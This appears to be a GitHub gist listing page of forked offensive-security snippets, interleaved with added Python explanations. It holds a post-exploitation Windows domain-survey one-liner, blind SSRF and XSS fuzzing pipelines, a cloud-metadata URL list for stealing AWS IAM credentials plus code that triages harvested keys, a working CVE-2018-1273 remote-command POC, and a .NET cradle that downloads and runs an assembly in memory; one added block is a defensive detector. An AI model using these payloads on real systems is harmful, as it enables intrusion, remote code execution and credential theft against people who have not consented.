@xstpl
xstpl / DomainEnumeration.bat
Created January 18, 2021 19:55 — forked from KyleHanslovan/DomainEnumeration.bat
Post-exploitation host/domain survey using native Windows commands.
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
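The chain above is also exactly what a detection engineer hunts for: a burst of distinct discovery commands (whoami, ipconfig, net user /domain, net group "domain admins" /domain, the Terminal Server Client registry read) from one host and user inside a few seconds. The block below is an added example, not part of the gist, that runs that logic over constructed process-creation events; the log line format, the bucket names, the 120-second window and the threshold of five distinct commands are assumptions to tune against real telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (not real telemetry). Format:
#   <UTC time> host=<host> user=<user> cmd=<command line>
# WS01 runs most of the one-liner in three seconds; WS02 runs two innocuous
# commands forty minutes apart and must not alert.
SAMPLE_LOGS = """\
2021-01-18T19:55:01Z host=WS01 user=CORP\\jdoe cmd=whoami
2021-01-18T19:55:01Z host=WS01 user=CORP\\jdoe cmd=hostname
2021-01-18T19:55:02Z host=WS01 user=CORP\\jdoe cmd=ipconfig /all
2021-01-18T19:55:02Z host=WS01 user=CORP\\jdoe cmd=net user /domain
2021-01-18T19:55:03Z host=WS01 user=CORP\\jdoe cmd=net group "domain admins" /domain
2021-01-18T19:55:03Z host=WS01 user=CORP\\jdoe cmd=net localgroup administrators
2021-01-18T19:55:04Z host=WS01 user=CORP\\jdoe cmd=systeminfo
2021-01-18T19:55:04Z host=WS01 user=CORP\\jdoe cmd=reg query "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default"
2021-01-18T19:30:00Z host=WS02 user=CORP\\admin cmd=ipconfig /all
2021-01-18T20:10:00Z host=WS02 user=CORP\\admin cmd=net user /domain
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

# Every element of the one-liner falls into one of these buckets. Order matters:
# the first matching pattern wins, so the /domain forms are tested before the
# local-account forms of net.exe.
DISCOVERY_PATTERNS = [
    ("local_survey", re.compile(r"^(whoami|hostname|systeminfo|ipconfig|netstat|tasklist|sc\s+query)\b", re.I)),
    ("domain_enum", re.compile(r"^net\s+(user|group|accounts)\b.*\s/domain\b", re.I)),
    ("local_accounts", re.compile(r"^net\s+(user|localgroup)\b", re.I)),
    ("rdp_history", re.compile(r"^reg\s+query\s+.*Terminal Server Client", re.I)),
]


def classify(cmd):
    """Return the discovery bucket for a command line, or None if it is not one."""
    for name, pattern in DISCOVERY_PATTERNS:
        if pattern.search(cmd.strip()):
            return name
    return None


def parse_events(text):
    """Parse the sample format into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "host": m["host"], "user": m["user"], "cmd": m["cmd"],
            "bucket": classify(m["cmd"]),
        })
    return events


def detect_discovery_chains(text, window_seconds=120, min_distinct=5):
    """Alert on each (host, user) that runs at least min_distinct distinct
    discovery commands, including at least one domain query, inside one window."""
    by_actor = defaultdict(list)
    for ev in parse_events(text):
        if ev["bucket"]:
            by_actor[(ev["host"], ev["user"])].append(ev)
    window = timedelta(seconds=window_seconds)
    alerts = []
    for (host, user), evs in by_actor.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            hits = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            cmds = {e["cmd"].lower() for e in hits}
            buckets = {e["bucket"] for e in hits}
            if len(cmds) >= min_distinct and "domain_enum" in buckets:
                alerts.append({"host": host, "user": user, "start": first["ts"],
                               "distinct_commands": len(cmds), "buckets": sorted(buckets)})
                break  # one alert per actor; later windows only repeat it
    return alerts


if __name__ == "__main__":
    for alert in detect_discovery_chains(SAMPLE_LOGS):
        print(alert)
```

Requiring a domain query in the window is what keeps a sysadmin's lone `ipconfig /all` or `systeminfo` out of the alert; the distinct-command count is what separates the survey burst from a script that polls one command repeatedly.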
@xstpl
xstpl / ssrf.sh
Created May 12, 2020 13:16 — forked from hussein98d/ssrf.sh
This script takes a domain name and a callback server, parses links, appends SSRF parameters and fires the requests.
echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callback"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
    echo >&2 "ERROR: Domain not set"
    exit 2
fi
if [ -z "$2" ]; then
    echo >&2 "ERROR: Server link not set"
    exit 2
fi
@xstpl
xstpl / xss_one_liner.md
Created May 12, 2020 13:14 — forked from cihanmehmet/xss_one_liner.md
xss_one_liner.md
# cat targets_urls.txt
http://public-firing-range.appspot.com

Command Line

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
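Both ssrf.sh above and this one-liner lean on the same step: take every crawled URL that has a query string and rewrite each parameter value with a payload (qsreplace does that; its -a flag appends to the value instead of replacing it), and, for the SSRF case, also add parameters the application never exposed. The block below is an added example, not code from either gist, reimplementing that step in Python. The SSRF_PARAM_NAMES list, the hostnames and the callback layout (the parameter name becomes a path component so the DNS or HTTP hit tells you which parameter fired) are assumptions.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Parameter names that commonly drive a server-side fetch; appended to a URL when
# it does not already carry them. Constructed list, not either gist's own.
SSRF_PARAM_NAMES = ["url", "uri", "redirect", "next", "dest", "callback", "target", "path", "src"]


def _with_query(parts, pairs):
    """Rebuild the URL with a new query; ':' and '/' stay literal so an embedded
    callback URL remains readable in logs and still parses on the server."""
    return urlunsplit(parts._replace(query=urlencode(pairs, safe=":/")))


def replace_query_values(url, payload, append=False):
    """qsreplace-style mutation: every query value becomes payload. With
    append=True the payload is appended to each existing value (qsreplace -a),
    which the XSS pipeline uses so the reflected context stays intact.
    Returns None for a URL without a query, matching the grep "=" filter."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if not pairs:
        return None
    mutated = [(k, v + payload if append else payload) for k, v in pairs]
    return _with_query(parts, mutated)


def ssrf_candidates(url, callback, names=SSRF_PARAM_NAMES):
    """URLs to fire for blind SSRF against one crawled URL: one request per
    existing parameter, each pointing at callback/<param>, then one per extra
    parameter name the URL did not already carry."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    base = callback.rstrip("/")
    out = []
    for i, (k, _v) in enumerate(pairs):
        out.append(_with_query(parts, pairs[:i] + [(k, f"{base}/{k}")] + pairs[i + 1:]))
    present = {k for k, _v in pairs}
    for name in names:
        if name not in present:
            out.append(_with_query(parts, pairs + [(name, f"{base}/{name}")]))
    return out


if __name__ == "__main__":
    # Constructed targets; public-firing-range is the host the one-liner feeds in.
    print(replace_query_values("http://public-firing-range.appspot.com/reflected/parameter/body?q=a",
                               '"><svg/onload=alert(1)>', append=True))
    for candidate in ssrf_candidates("http://target.example/fetch?u=a&page=1", "http://cb.example"):
        print(candidate)
```

Mutating one parameter per request (rather than all of them at once, as qsreplace does) costs more requests but is what makes a blind callback attributable to a single parameter.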
@xstpl
xstpl / sslsub.sh
Created May 12, 2020 13:08 — forked from gwen001/sslsub.sh
get altnames from ssl certificates
# Print the SAN DNS names of the certificate a host serves (SNI set to the host so vhost certs are returned).
function sslsub() {
timeout 3 openssl s_client -showcerts -servername "$1" -connect "$1:443" <<< "Q" 2>/dev/null | openssl x509 -text -noout | grep DNS | tr ',' '\n' | cut -d ':' -f 2 | sort -fu
}
@xstpl
xstpl / cloud_metadata.txt
Created July 14, 2019 20:07 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
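The AWS entries above pay off once you know how to read what comes back. The listing at /latest/meta-data/iam/security-credentials/ returns role names, one per line, and the per-role document is JSON carrying AccessKeyId, SecretAccessKey and Token (the credentials live under meta-data; /latest/user-data is the instance's own bootstrap script). The block below is an added example, not part of the gist, that orders the probes and triages the responses; the role name, the status codes passed in and the sample credential document are constructed. It also encodes the caveat a tester hits most: when IMDSv2 is enforced, GETs without a session token get 401, and the token only comes from PUT /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds header, which a GET-only SSRF cannot send.

```python
import json

IMDS = "http://169.254.169.254/latest"
CRED_KEYS = ("AccessKeyId", "SecretAccessKey", "Token", "Expiration")

# Constructed sample of the per-role credential document IMDS returns. The key
# material is a placeholder with the real field layout, not a real credential.
SAMPLE_CRED_BODY = json.dumps({
    "Code": "Success",
    "LastUpdated": "2019-07-14T20:07:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
    "SecretAccessKey": "EXAMPLEsecretEXAMPLEsecretEXAMPLEsecret0",
    "Token": "EXAMPLEsessionTokenEXAMPLE==",
    "Expiration": "2019-07-15T02:30:00Z",
})


def aws_imds_probe_urls(role_name=None):
    """IMDS URLs in the order a tester pushes them through an SSRF: cheap
    fingerprints first, then the role listing, then the credential document
    once the listing has given up a role name."""
    urls = [
        f"{IMDS}/meta-data/hostname",
        f"{IMDS}/meta-data/ami-id",
        f"{IMDS}/user-data",
        f"{IMDS}/meta-data/iam/security-credentials/",
    ]
    if role_name:
        urls.append(f"{IMDS}/meta-data/iam/security-credentials/{role_name}")
    return urls


def triage_imds_response(url, status, body):
    """Classify one (url, HTTP status, body) the SSRF returned as (finding, detail)."""
    if status == 401:
        # IMDSv2 enforced: the PUT /latest/api/token handshake is required and a
        # GET-only SSRF cannot perform it, so there is nothing more to get here.
        return ("imdsv2_required", None)
    if status != 200:
        return ("no_data", None)
    if url.rstrip("/").endswith("/iam/security-credentials"):
        roles = [line.strip() for line in body.splitlines() if line.strip()]
        return ("role_names", roles)
    try:
        doc = json.loads(body)
    except ValueError:
        doc = None
    if isinstance(doc, dict) and all(k in doc for k in CRED_KEYS):
        return ("credentials", {k: doc[k] for k in CRED_KEYS})
    return ("metadata", body.strip())


if __name__ == "__main__":
    # Walk the probe order with constructed responses, the way a harness that
    # feeds each URL through the vulnerable parameter would.
    urls = aws_imds_probe_urls()
    listing = triage_imds_response(urls[-1], 200, "webapp-role\n")
    print(listing)
    role_url = aws_imds_probe_urls(listing[1][0])[-1]
    print(triage_imds_response(role_url, 200, SAMPLE_CRED_BODY))
    print(triage_imds_response(urls[0], 401, ""))
```

A "credentials" finding is a temporary STS triple, so the Token must be presented alongside the key pair (as AWS_SESSION_TOKEN) for it to be usable, and it expires at the Expiration timestamp.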
@xstpl
xstpl / get_dns_records.py
Created January 15, 2019 14:46 — forked from f0r34chb3t4/get_dns_records.py
Printing all DNS records using DNSPython in Python 3
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2016 Akshay Raj Gollahalli
import dns.resolver
def get_records(domain):
    """Print every record that resolves for domain, one record type at a time."""
    for rtype in ('A', 'AAAA', 'CNAME', 'MX', 'NS', 'SOA', 'TXT'):
        try:
            answers = dns.resolver.resolve(domain, rtype)
        except Exception:  # NoAnswer, NXDOMAIN, NoNameservers, timeout
            continue
        for rdata in answers:
            print(rtype, rdata.to_text())
@xstpl
xstpl / CVE-2018-1273.http
Created August 7, 2018 00:47 — forked from matthiaskaiser/CVE-2018-1273.http
POC for CVE-2018-1273
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
@xstpl
xstpl / linuxprivchecker.py
Created August 6, 2018 18:07 — forked from sh1n0b1/linuxprivchecker.py
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
#!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
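The three checks the header names (world-writable files, setuid binaries, clear-text passwords in config files) are each a few lines of stat and grep once the file walk is in place. The block below is an added example written for this page, not code from linuxprivchecker.py, showing those three checks over a constructed directory tree so they can be run without root; the credential regex, the config-file suffix list and the demo file names are assumptions.

```python
import os
import re
import stat
import tempfile

# Heuristic for credential assignments in config files (assumed pattern).
PASSWORD_RE = re.compile(r"(pass(word|wd)?|secret|token)\s*[=:]\s*\S+", re.I)
# File names worth grepping for credentials; extend for the target environment.
CONFIG_SUFFIXES = (".conf", ".cfg", ".ini", ".env", ".yml", ".yaml", ".properties")


def _regular_files(root):
    """Yield (path, stat) for regular files under root. Symlinks are lstat'ed and
    skipped, so a link pointing into /tmp is not reported on its target's behalf."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st


def find_world_writable(root):
    """Files any local user can modify (o+w); a script or config here is an
    escalation vector when something privileged reads or executes it."""
    return sorted(p for p, st in _regular_files(root) if st.st_mode & stat.S_IWOTH)


def find_setuid_setgid(root):
    """Files that execute with their owner's or group's identity."""
    return sorted(p for p, st in _regular_files(root)
                  if st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def find_cleartext_passwords(root):
    """(path, line number, line) for credential-looking assignments in config files."""
    hits = []
    for path, _st in _regular_files(root):
        if not path.endswith(CONFIG_SUFFIXES):
            continue
        try:
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if PASSWORD_RE.search(line):
                        hits.append((path, lineno, line.rstrip("\n")))
        except OSError:
            continue
    return hits


def run_checks(root):
    """Run every check under root and return the findings by category."""
    return {
        "world_writable": find_world_writable(root),
        "setuid_setgid": find_setuid_setgid(root),
        "cleartext_passwords": find_cleartext_passwords(root),
    }


def make_demo_tree():
    """Build a throwaway directory (constructed sample, not a real system) with one
    world-writable config holding a password, one tight config and one setuid
    helper, so the checks can be exercised without root."""
    root = tempfile.mkdtemp(prefix="privcheck-")
    files = {
        "loose.conf": (0o666, "db_host=localhost\ndb_password=hunter2\n"),
        "tight.conf": (0o644, "db_host=localhost\n"),
        "helper": (0o4755, "#!/bin/sh\nid\n"),
    }
    for name, (mode, body) in files.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    for category, findings in run_checks(demo).items():
        print(category)
        for finding in findings:
            print("  ", finding)
```

On a real host you would point run_checks at / (or at /etc, /opt, /home and /var) and, for the setuid list, compare it against the distribution's default set; only binaries outside that baseline deserve attention.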
@xstpl
xstpl / DotnetAssemblyDownloadCradle.cs
Created July 21, 2018 12:00 — forked from cobbr/DotnetAssemblyDownloadCradle.cs
A download cradle for .NET assemblies.
// Fetches the assembly bytes from the URL in args[0], loads them straight from memory (nothing written to disk) and invokes the first method of the first type.
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
@xstpl
xstpl / mysql_brute.rb
Created January 11, 2017 22:09 — forked from postmodern/mysql_brute.rb
MySQL Bruteforcer

Configuration

  • mysql: 14.14 Distrib 5.5.14
  • host: 127.0.0.1
  • port: 3306
  • user: victim
  • password: 56789

Install